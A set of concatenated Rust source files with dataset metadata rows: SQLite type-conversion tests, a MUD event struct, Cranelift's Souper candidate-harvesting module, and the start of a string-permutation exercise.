.
next
(
)
?
.
unwrap
(
)
;
let
s2
:
Option
<
String
>
=
row2
.
get_unwrap
(
0
)
;
let
b2
:
Option
<
Vec
<
u8
>
>
=
row2
.
get_unwrap
(
1
)
;
assert
!
(
s2
.
is_none
(
)
)
;
assert_eq
!
(
b
b2
)
;
}
Ok
(
(
)
)
}
#
[
test
]
#
[
allow
(
clippy
:
:
cognitive_complexity
)
]
fn
test_mismatched_types
(
)
-
>
Result
<
(
)
>
{
fn
is_invalid_column_type
(
err
:
Error
)
-
>
bool
{
matches
!
(
err
Error
:
:
InvalidColumnType
(
.
.
)
)
}
let
db
=
checked_memory_handle
(
)
?
;
db
.
execute
(
"
INSERT
INTO
foo
(
b
t
i
f
)
VALUES
(
X
'
0102
'
'
text
'
1
1
.
5
)
"
[
]
)
?
;
let
mut
stmt
=
db
.
prepare
(
"
SELECT
b
t
i
f
n
FROM
foo
"
)
?
;
let
mut
rows
=
stmt
.
query
(
[
]
)
?
;
let
row
=
rows
.
next
(
)
?
.
unwrap
(
)
;
assert_eq
!
(
vec
!
[
1
2
]
row
.
get
:
:
<
_
Vec
<
u8
>
>
(
0
)
?
)
;
assert_eq
!
(
"
text
"
row
.
get
:
:
<
_
String
>
(
1
)
?
)
;
assert_eq
!
(
1
row
.
get
:
:
<
_
c_int
>
(
2
)
?
)
;
assert
!
(
(
1
.
5
-
row
.
get
:
:
<
_
c_double
>
(
3
)
?
)
.
abs
(
)
<
f64
:
:
EPSILON
)
;
assert_eq
!
(
row
.
get
:
:
<
_
Option
<
c_int
>
>
(
4
)
?
None
)
;
assert_eq
!
(
row
.
get
:
:
<
_
Option
<
c_double
>
>
(
4
)
?
None
)
;
assert_eq
!
(
row
.
get
:
:
<
_
Option
<
String
>
>
(
4
)
?
None
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
c_int
>
(
0
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
c_int
>
(
0
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
i64
>
(
0
)
.
err
(
)
.
unwrap
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
c_double
>
(
0
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
String
>
(
0
)
.
unwrap_err
(
)
)
)
;
#
[
cfg
(
feature
=
"
time
"
)
]
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
time
:
:
OffsetDateTime
>
(
0
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
Option
<
c_int
>
>
(
0
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
c_int
>
(
1
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
i64
>
(
1
)
.
err
(
)
.
unwrap
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
c_double
>
(
1
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
Vec
<
u8
>
>
(
1
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
Option
<
c_int
>
>
(
1
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
String
>
(
2
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
Vec
<
u8
>
>
(
2
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
Option
<
String
>
>
(
2
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
c_int
>
(
3
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
i64
>
(
3
)
.
err
(
)
.
unwrap
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
String
>
(
3
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
Vec
<
u8
>
>
(
3
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
Option
<
c_int
>
>
(
3
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
c_int
>
(
4
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
i64
>
(
4
)
.
err
(
)
.
unwrap
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
c_double
>
(
4
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
String
>
(
4
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
Vec
<
u8
>
>
(
4
)
.
unwrap_err
(
)
)
)
;
#
[
cfg
(
feature
=
"
time
"
)
]
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
time
:
:
OffsetDateTime
>
(
4
)
.
unwrap_err
(
)
)
)
;
Ok
(
(
)
)
}
#
[
test
]
fn
test_dynamic_type
(
)
-
>
Result
<
(
)
>
{
use
super
:
:
Value
;
let
db
=
checked_memory_handle
(
)
?
;
db
.
execute
(
"
INSERT
INTO
foo
(
b
t
i
f
)
VALUES
(
X
'
0102
'
'
text
'
1
1
.
5
)
"
[
]
)
?
;
let
mut
stmt
=
db
.
prepare
(
"
SELECT
b
t
i
f
n
FROM
foo
"
)
?
;
let
mut
rows
=
stmt
.
query
(
[
]
)
?
;
let
row
=
rows
.
next
(
)
?
.
unwrap
(
)
;
assert_eq
!
(
Value
:
:
Blob
(
vec
!
[
1
2
]
)
row
.
get
:
:
<
_
Value
>
(
0
)
?
)
;
assert_eq
!
(
Value
:
:
Text
(
String
:
:
from
(
"
text
"
)
)
row
.
get
:
:
<
_
Value
>
(
1
)
?
)
;
assert_eq
!
(
Value
:
:
Integer
(
1
)
row
.
get
:
:
<
_
Value
>
(
2
)
?
)
;
match
row
.
get
:
:
<
_
Value
>
(
3
)
?
{
Value
:
:
Real
(
val
)
=
>
assert
!
(
(
1
.
5
-
val
)
.
abs
(
)
<
f64
:
:
EPSILON
)
x
=
>
panic
!
(
"
Invalid
Value
{
:
?
}
"
x
)
}
assert_eq
!
(
Value
:
:
Null
row
.
get
:
:
<
_
Value
>
(
4
)
?
)
;
Ok
(
(
)
)
}
macro_rules
!
test_conversion
{
(
db_etc
:
ident
insert_value
:
expr
get_type
:
ty
expect
expected_value
:
expr
)
=
>
{
db_etc
.
insert_statement
.
execute
(
params
!
[
insert_value
]
)
?
;
let
res
=
db_etc
.
query_statement
.
query_row
(
[
]
|
row
|
row
.
get
:
:
<
_
get_type
>
(
0
)
)
;
assert_eq
!
(
res
?
expected_value
)
;
db_etc
.
delete_statement
.
execute
(
[
]
)
?
;
}
;
(
db_etc
:
ident
insert_value
:
expr
get_type
:
ty
expect_from_sql_error
)
=
>
{
db_etc
.
insert_statement
.
execute
(
params
!
[
insert_value
]
)
?
;
let
res
=
db_etc
.
query_statement
.
query_row
(
[
]
|
row
|
row
.
get
:
:
<
_
get_type
>
(
0
)
)
;
res
.
unwrap_err
(
)
;
db_etc
.
delete_statement
.
execute
(
[
]
)
?
;
}
;
(
db_etc
:
ident
insert_value
:
expr
get_type
:
ty
expect_to_sql_error
)
=
>
{
db_etc
.
insert_statement
.
execute
(
params
!
[
insert_value
]
)
.
unwrap_err
(
)
;
}
;
}
#
[
test
]
fn
test_numeric_conversions
(
)
-
>
Result
<
(
)
>
{
#
!
[
allow
(
clippy
:
:
float_cmp
)
]
let
db
=
Connection
:
:
open_in_memory
(
)
?
;
db
.
execute_batch
(
"
CREATE
TABLE
foo
(
x
)
"
)
?
;
struct
DbEtc
<
'
conn
>
{
insert_statement
:
Statement
<
'
conn
>
query_statement
:
Statement
<
'
conn
>
delete_statement
:
Statement
<
'
conn
>
}
let
mut
db_etc
=
DbEtc
{
insert_statement
:
db
.
prepare
(
"
INSERT
INTO
foo
VALUES
(
?
1
)
"
)
?
query_statement
:
db
.
prepare
(
"
SELECT
x
FROM
foo
"
)
?
delete_statement
:
db
.
prepare
(
"
DELETE
FROM
foo
"
)
?
}
;
test_conversion
!
(
db_etc
0u8
u8
expect
0u8
)
;
test_conversion
!
(
db_etc
100u8
i8
expect
100i8
)
;
test_conversion
!
(
db_etc
200u8
u8
expect
200u8
)
;
test_conversion
!
(
db_etc
100u16
i8
expect
100i8
)
;
test_conversion
!
(
db_etc
200u16
u8
expect
200u8
)
;
test_conversion
!
(
db_etc
u32
:
:
MAX
u64
expect
u32
:
:
MAX
as
u64
)
;
test_conversion
!
(
db_etc
i64
:
:
MIN
i64
expect
i64
:
:
MIN
)
;
test_conversion
!
(
db_etc
i64
:
:
MAX
i64
expect
i64
:
:
MAX
)
;
test_conversion
!
(
db_etc
i64
:
:
MAX
u64
expect
i64
:
:
MAX
as
u64
)
;
test_conversion
!
(
db_etc
100usize
usize
expect
100usize
)
;
test_conversion
!
(
db_etc
100u64
u64
expect
100u64
)
;
test_conversion
!
(
db_etc
i64
:
:
MAX
as
u64
u64
expect
i64
:
:
MAX
as
u64
)
;
test_conversion
!
(
db_etc
200u8
i8
expect_from_sql_error
)
;
test_conversion
!
(
db_etc
400u16
i8
expect_from_sql_error
)
;
test_conversion
!
(
db_etc
400u16
u8
expect_from_sql_error
)
;
test_conversion
!
(
db_etc
-
1i8
u8
expect_from_sql_error
)
;
test_conversion
!
(
db_etc
i64
:
:
MIN
u64
expect_from_sql_error
)
;
test_conversion
!
(
db_etc
u64
:
:
MAX
i64
expect_to_sql_error
)
;
test_conversion
!
(
db_etc
u64
:
:
MAX
u64
expect_to_sql_error
)
;
test_conversion
!
(
db_etc
i64
:
:
MAX
as
u64
+
1
u64
expect_to_sql_error
)
;
test_conversion
!
(
db_etc
i64
:
:
MIN
f32
expect
i64
:
:
MIN
as
f32
)
;
test_conversion
!
(
db_etc
i64
:
:
MAX
f32
expect
i64
:
:
MAX
as
f32
)
;
test_conversion
!
(
db_etc
i64
:
:
MIN
f64
expect
i64
:
:
MIN
as
f64
)
;
test_conversion
!
(
db_etc
i64
:
:
MAX
f64
expect
i64
:
:
MAX
as
f64
)
;
test_conversion
!
(
db_etc
0f64
i64
expect_from_sql_error
)
;
Ok
(
(
)
)
}
}
| true |
9ff53f52ccae742d9e4a50ed2383f9c434363a12
|
Rust
|
ncatelli/mud
|
/mud/src/web/event.rs
|
UTF-8
| 611 | 3.046875 | 3 |
[] |
no_license
|
extern crate serde;
extern crate serde_json;
// The kind of event carried by an `Event`. Only game events exist so far;
// serialized with serde for transport.
#[derive(Serialize, Deserialize, Debug, Clone)]
pub enum EventType {
    Game,
}
// A serializable event: a type tag plus a message payload. Fields are
// private; use `Event::new` and the accessor methods.
#[derive(Serialize, Deserialize, Debug)]
pub struct Event {
    event: EventType,
    message: String,
}
#[allow(dead_code)]
impl Event {
    /// Construct an event of the given type carrying `message`.
    ///
    /// Uses field-init shorthand in place of the original redundant
    /// `event: event` / `message: message`. The per-method
    /// `#[allow(dead_code)]` attributes were dropped because the attribute
    /// on the `impl` block already covers every item within it.
    pub fn new(event: EventType, message: String) -> Event {
        Event { event, message }
    }

    /// The event's type tag (returned by clone).
    pub fn event(&self) -> EventType {
        self.event.clone()
    }

    /// The event's message payload (returned by clone).
    pub fn message(&self) -> String {
        self.message.clone()
    }
}
| true |
3b8693c714310223e84a274523d1a8c4b0426baf
|
Rust
|
bytecodealliance/wasmtime
|
/cranelift/codegen/src/souper_harvest.rs
|
UTF-8
| 26,128 | 3.21875 | 3 |
[
"LLVM-exception",
"Apache-2.0"
] |
permissive
|
//! Harvest left-hand side superoptimization candidates.
//!
//! Given a clif function, harvest all its integer subexpressions, so that they
//! can be fed into [Souper](https://github.com/google/souper) as candidates for
//! superoptimization. For some of these candidates, Souper will successfully
//! synthesize a right-hand side that is equivalent but has lower cost than the
//! left-hand side. Then, we can combine these left- and right-hand sides into a
//! complete optimization, and add it to our peephole passes.
//!
//! To harvest the expression that produced a given value `x`, we do a
//! post-order traversal of the dataflow graph starting from `x`. As we do this
//! traversal, we maintain a map from clif values to their translated Souper
//! values. We stop traversing when we reach anything that can't be translated
//! into Souper IR: a memory load, a float-to-int conversion, a block parameter,
//! etc. For values produced by these instructions, we create a Souper `var`,
//! which is an input variable to the optimization. For instructions that have a
//! direct mapping into Souper IR, we get the Souper version of each of its
//! operands and then create the Souper version of the instruction itself. It
//! should now be clear why we do a post-order traversal: we need an
//! instruction's translated operands in order to translate the instruction
//! itself. Once this instruction is translated, we update the clif-to-souper
//! map with this new translation so that any other instruction that uses this
//! result as an operand has access to the translated value. When the traversal
//! is complete we return the translation of `x` as the root of left-hand side
//! candidate.
use crate::ir;
use souper_ir::ast;
use std::collections::{HashMap, HashSet};
use std::string::String;
use std::sync::mpsc;
use std::vec::Vec;
/// Harvest Souper left-hand side candidates from the given function.
///
/// Candidates are reported through the given MPSC sender.
pub fn do_souper_harvest(func: &ir::Function, out: &mut mpsc::Sender<String>) {
    let mut allocs = Allocs::default();

    // Visit every instruction of every block, harvesting a candidate from
    // each instruction that produces exactly one single-lane integer result.
    for block in func.layout.blocks() {
        let mut cursor = func.layout.first_inst(block);
        while let Some(inst) = cursor {
            if let [val] = func.dfg.inst_results(inst) {
                let ty = func.dfg.value_type(*val);
                if ty.is_int() && ty.lane_count() == 1 {
                    harvest_candidate_lhs(&mut allocs, func, *val, out);
                }
            }
            cursor = func.layout.next_inst(inst);
        }
    }
}
/// Allocations that we reuse across many LHS candidate harvests.
///
/// The collections are emptied (but not deallocated) via `Allocs::reset`
/// between harvests, so their backing storage is reused.
#[derive(Default)]
struct Allocs {
    /// A map from cranelift IR to souper IR for values that we've already
    /// translated into souper IR.
    ir_to_souper_val: HashMap<ir::Value, ast::ValueId>,
    /// Stack of to-visit and to-trace values for the post-order DFS.
    dfs_stack: Vec<StackEntry>,
    /// Set of values we've already seen in our post-order DFS.
    dfs_seen: HashSet<ir::Value>,
}
impl Allocs {
/// Reset the collections to their empty state (without deallocating their
/// backing data).
fn reset(&mut self) {
self.ir_to_souper_val.clear();
self.dfs_stack.clear();
self.dfs_seen.clear();
}
}
/// Harvest a candidate LHS for `val` from the dataflow graph.
fn harvest_candidate_lhs(
allocs: &mut Allocs,
func: &ir::Function,
val: ir::Value,
out: &mut mpsc::Sender<String>,
) {
allocs.reset();
let mut lhs = ast::LeftHandSideBuilder::default();
let mut non_var_count = 0;
// Should we keep tracing through the given `val`? Only if it is defined
// by an instruction that we can translate to Souper IR.
let should_trace = |val| match func.dfg.value_def(val) {
ir::ValueDef::Result(inst, 0) => match func.dfg.insts[inst].opcode() {
ir::Opcode::Iadd
| ir::Opcode::IaddImm
| ir::Opcode::IrsubImm
| ir::Opcode::Imul
| ir::Opcode::ImulImm
| ir::Opcode::Udiv
| ir::Opcode::UdivImm
| ir::Opcode::Sdiv
| ir::Opcode::SdivImm
| ir::Opcode::Urem
| ir::Opcode::UremImm
| ir::Opcode::Srem
| ir::Opcode::SremImm
| ir::Opcode::Band
| ir::Opcode::BandImm
| ir::Opcode::Bor
| ir::Opcode::BorImm
| ir::Opcode::Bxor
| ir::Opcode::BxorImm
| ir::Opcode::Ishl
| ir::Opcode::IshlImm
| ir::Opcode::Sshr
| ir::Opcode::SshrImm
| ir::Opcode::Ushr
| ir::Opcode::UshrImm
| ir::Opcode::Select
| ir::Opcode::Uextend
| ir::Opcode::Sextend
| ir::Opcode::Trunc
| ir::Opcode::Icmp
| ir::Opcode::Popcnt
| ir::Opcode::Bitrev
| ir::Opcode::Clz
| ir::Opcode::Ctz
// TODO: ir::Opcode::IaddCarry
| ir::Opcode::SaddSat
| ir::Opcode::SsubSat
| ir::Opcode::UsubSat => true,
_ => false,
},
_ => false,
};
post_order_dfs(allocs, &func.dfg, val, should_trace, |allocs, val| {
let souper_assignment_rhs = match func.dfg.value_def(val) {
ir::ValueDef::Result(inst, 0) => {
let args = func.dfg.inst_args(inst);
// Get the n^th argument as a souper operand.
let arg = |allocs: &mut Allocs, n| {
let arg = args[n];
if let Some(a) = allocs.ir_to_souper_val.get(&arg).copied() {
a.into()
} else {
// The only arguments we get that we haven't already
// converted into a souper instruction are `iconst`s.
// This is because souper only allows
// constants as operands, and it doesn't allow assigning
// constants to a variable name. So we lazily convert
// `iconst`s into souper operands here,
// when they are actually used.
match func.dfg.value_def(arg) {
ir::ValueDef::Result(inst, 0) => match func.dfg.insts[inst] {
ir::InstructionData::UnaryImm { opcode, imm } => {
debug_assert_eq!(opcode, ir::Opcode::Iconst);
let imm: i64 = imm.into();
ast::Operand::Constant(ast::Constant {
value: imm.into(),
r#type: souper_type_of(&func.dfg, arg),
})
}
_ => unreachable!(
"only iconst instructions \
aren't in `ir_to_souper_val`"
),
},
_ => unreachable!(
"only iconst instructions \
aren't in `ir_to_souper_val`"
),
}
}
};
match (func.dfg.insts[inst].opcode(), &func.dfg.insts[inst]) {
(ir::Opcode::Iadd, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::Add { a, b }.into()
}
(ir::Opcode::IaddImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let a = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let b = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::Add { a, b }.into()
}
(ir::Opcode::IrsubImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let b = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let a = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::Sub { a, b }.into()
}
(ir::Opcode::Imul, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::Mul { a, b }.into()
}
(ir::Opcode::ImulImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let a = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let b = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::Mul { a, b }.into()
}
(ir::Opcode::Udiv, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::Udiv { a, b }.into()
}
(ir::Opcode::UdivImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let a = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let b = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::Udiv { a, b }.into()
}
(ir::Opcode::Sdiv, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::Sdiv { a, b }.into()
}
(ir::Opcode::SdivImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let a = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let b = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::Sdiv { a, b }.into()
}
(ir::Opcode::Urem, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::Urem { a, b }.into()
}
(ir::Opcode::UremImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let a = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let b = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::Urem { a, b }.into()
}
(ir::Opcode::Srem, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::Srem { a, b }.into()
}
(ir::Opcode::SremImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let a = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let b = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::Srem { a, b }.into()
}
(ir::Opcode::Band, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::And { a, b }.into()
}
(ir::Opcode::BandImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let a = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let b = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::And { a, b }.into()
}
(ir::Opcode::Bor, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::Or { a, b }.into()
}
(ir::Opcode::BorImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let a = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let b = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::Or { a, b }.into()
}
(ir::Opcode::Bxor, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::Xor { a, b }.into()
}
(ir::Opcode::BxorImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let a = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let b = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::Xor { a, b }.into()
}
(ir::Opcode::Ishl, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::Shl { a, b }.into()
}
(ir::Opcode::IshlImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let a = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let b = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::Shl { a, b }.into()
}
(ir::Opcode::Sshr, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::Ashr { a, b }.into()
}
(ir::Opcode::SshrImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let a = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let b = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::Ashr { a, b }.into()
}
(ir::Opcode::Ushr, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::Lshr { a, b }.into()
}
(ir::Opcode::UshrImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let a = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let b = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::Lshr { a, b }.into()
}
(ir::Opcode::Select, _) => {
let a = arg(allocs, 0);
// While Cranelift allows any width condition for
// `select` and checks it against `0`, Souper requires
// an `i1`. So insert a `ne %x, 0` as needed.
let a = match a {
ast::Operand::Value(id) => match lhs.get_value(id).r#type {
Some(ast::Type { width: 1 }) => a,
_ => lhs
.assignment(
None,
Some(ast::Type { width: 1 }),
ast::Instruction::Ne {
a,
b: ast::Constant {
value: 0,
r#type: None,
}
.into(),
},
vec![],
)
.into(),
},
ast::Operand::Constant(ast::Constant { value, .. }) => ast::Constant {
value: (value != 0) as _,
r#type: Some(ast::Type { width: 1 }),
}
.into(),
};
let b = arg(allocs, 1);
let c = arg(allocs, 2);
ast::Instruction::Select { a, b, c }.into()
}
(ir::Opcode::Uextend, _) => {
let a = arg(allocs, 0);
ast::Instruction::Zext { a }.into()
}
(ir::Opcode::Sextend, _) => {
let a = arg(allocs, 0);
ast::Instruction::Sext { a }.into()
}
(ir::Opcode::Trunc, _) => {
let a = arg(allocs, 0);
ast::Instruction::Trunc { a }.into()
}
(ir::Opcode::Icmp, ir::InstructionData::IntCompare { cond, .. })
| (ir::Opcode::IcmpImm, ir::InstructionData::IntCompare { cond, .. }) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
match cond {
ir::condcodes::IntCC::Equal => ast::Instruction::Eq { a, b }.into(),
ir::condcodes::IntCC::NotEqual => ast::Instruction::Ne { a, b }.into(),
ir::condcodes::IntCC::UnsignedLessThan => {
ast::Instruction::Ult { a, b }.into()
}
ir::condcodes::IntCC::SignedLessThan => {
ast::Instruction::Slt { a, b }.into()
}
ir::condcodes::IntCC::UnsignedLessThanOrEqual => {
ast::Instruction::Sle { a, b }.into()
}
ir::condcodes::IntCC::SignedLessThanOrEqual => {
ast::Instruction::Sle { a, b }.into()
}
_ => ast::AssignmentRhs::Var,
}
}
(ir::Opcode::Popcnt, _) => {
let a = arg(allocs, 0);
ast::Instruction::Ctpop { a }.into()
}
(ir::Opcode::Bitrev, _) => {
let a = arg(allocs, 0);
ast::Instruction::BitReverse { a }.into()
}
(ir::Opcode::Clz, _) => {
let a = arg(allocs, 0);
ast::Instruction::Ctlz { a }.into()
}
(ir::Opcode::Ctz, _) => {
let a = arg(allocs, 0);
ast::Instruction::Cttz { a }.into()
}
// TODO: ir::Opcode::IaddCarry
(ir::Opcode::SaddSat, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::SaddSat { a, b }.into()
}
(ir::Opcode::SsubSat, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::SsubSat { a, b }.into()
}
(ir::Opcode::UsubSat, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::UsubSat { a, b }.into()
}
// Because Souper doesn't allow constants to be on the right
// hand side of an assignment (i.e. `%0:i32 = 1234` is
// disallowed) we have to ignore `iconst`
// instructions until we process them as operands for some
// other instruction. See the `arg` closure above for
// details.
(ir::Opcode::Iconst, _) => return,
_ => ast::AssignmentRhs::Var,
}
}
_ => ast::AssignmentRhs::Var,
};
non_var_count += match souper_assignment_rhs {
ast::AssignmentRhs::Var => 0,
_ => 1,
};
let souper_ty = souper_type_of(&func.dfg, val);
let souper_val = lhs.assignment(None, souper_ty, souper_assignment_rhs, vec![]);
let old_value = allocs.ir_to_souper_val.insert(val, souper_val);
assert!(old_value.is_none());
});
// We end up harvesting a lot of candidates like:
//
// %0:i32 = var
// infer %0
//
// and
//
// %0:i32 = var
// %1:i32 = var
// %2:i32 = add %0, %1
//
// Both of these are useless. Only actually harvest the candidate if there
// are at least two actual operations.
if non_var_count >= 2 {
let lhs = lhs.finish(allocs.ir_to_souper_val[&val], None);
out.send(format!(
";; Harvested from `{}` in `{}`\n{}\n",
val, func.name, lhs
))
.unwrap();
}
}
/// Translates the Cranelift type of `val` into a Souper type.
///
/// Only scalar integer values are supported (asserted below). Results of
/// `icmp`/`icmp_imm` are reported as `i1`, which is the width Souper
/// expects for comparison results regardless of the Cranelift type.
fn souper_type_of(dfg: &ir::DataFlowGraph, val: ir::Value) -> Option<ast::Type> {
    let ty = dfg.value_type(val);
    assert!(ty.is_int());
    assert_eq!(ty.lane_count(), 1);

    // Is this value produced by an integer comparison?
    let is_icmp = dfg.value_def(val).inst().map_or(false, |inst| {
        let opcode = dfg.insts[inst].opcode();
        opcode == ir::Opcode::Icmp || opcode == ir::Opcode::IcmpImm
    });

    let width = if is_icmp {
        1
    } else {
        ty.bits().try_into().unwrap()
    };
    Some(ast::Type { width })
}
/// Work items for the explicit-stack depth-first traversal in
/// `post_order_dfs` below.
#[derive(Debug)]
enum StackEntry {
    /// Emit this value to the visitor; its operands have already been traced.
    Visit(ir::Value),
    /// Explore this value's operands before scheduling its visit.
    Trace(ir::Value),
}
/// Iterative post-order DFS over the dataflow graph rooted at `val`.
///
/// Each value is visited exactly once (tracked via `allocs.dfs_seen`),
/// after all of its operands have been visited. `should_trace` decides
/// whether a value's operands are explored at all; `visit` is the
/// post-order callback. Uses an explicit stack (`allocs.dfs_stack`)
/// instead of recursion.
fn post_order_dfs(
    allocs: &mut Allocs,
    dfg: &ir::DataFlowGraph,
    val: ir::Value,
    should_trace: impl Fn(ir::Value) -> bool,
    mut visit: impl FnMut(&mut Allocs, ir::Value),
) {
    allocs.dfs_stack.push(StackEntry::Trace(val));
    while let Some(entry) = allocs.dfs_stack.pop() {
        match entry {
            StackEntry::Visit(val) => {
                // `insert` returns false if already present, so a value
                // reachable along multiple paths is only visited once.
                let is_new = allocs.dfs_seen.insert(val);
                if is_new {
                    visit(allocs, val);
                }
            }
            StackEntry::Trace(val) => {
                if allocs.dfs_seen.contains(&val) {
                    continue;
                }
                // Schedule the visit first, then push operands on top, so
                // operands are popped (and visited) before this value.
                allocs.dfs_stack.push(StackEntry::Visit(val));
                if should_trace(val) {
                    // Only single-result instructions are traced further.
                    if let ir::ValueDef::Result(inst, 0) = dfg.value_def(val) {
                        let args = dfg.inst_args(inst);
                        for v in args.iter().rev().copied() {
                            allocs.dfs_stack.push(StackEntry::Trace(v));
                        }
                    }
                }
            }
        }
    }
}
| true |
c5a44995eada26a3f50ef14959b364ca74afa37c
|
Rust
|
shreyasdamle/rust_101
|
/src/ctci_02.rs
|
UTF-8
| 1,125 | 3.90625 | 4 |
[
"MIT"
] |
permissive
|
use std::collections::HashMap;
/// Demonstrates the permutation check on a small example pair.
pub fn run() {
    let outcome = is_permutation("abc", "cba");
    println!("Result: {}", outcome);
}
//CTCI: Is permutation
/// Returns `true` if `input2` is a permutation of `input1`.
///
/// Counts the characters of `input1` in one map, then decrements the
/// counts while scanning `input2`; the two strings are permutations of
/// each other exactly when every count returns to zero. This runs in
/// O(n) with a single `HashMap` instead of building and comparing two.
fn is_permutation(input1: &str, input2: &str) -> bool {
    // Strings of different lengths can never be permutations.
    if input1.len() != input2.len() {
        return false;
    }
    let mut counts: HashMap<char, i32> = HashMap::new();
    for c in input1.chars() {
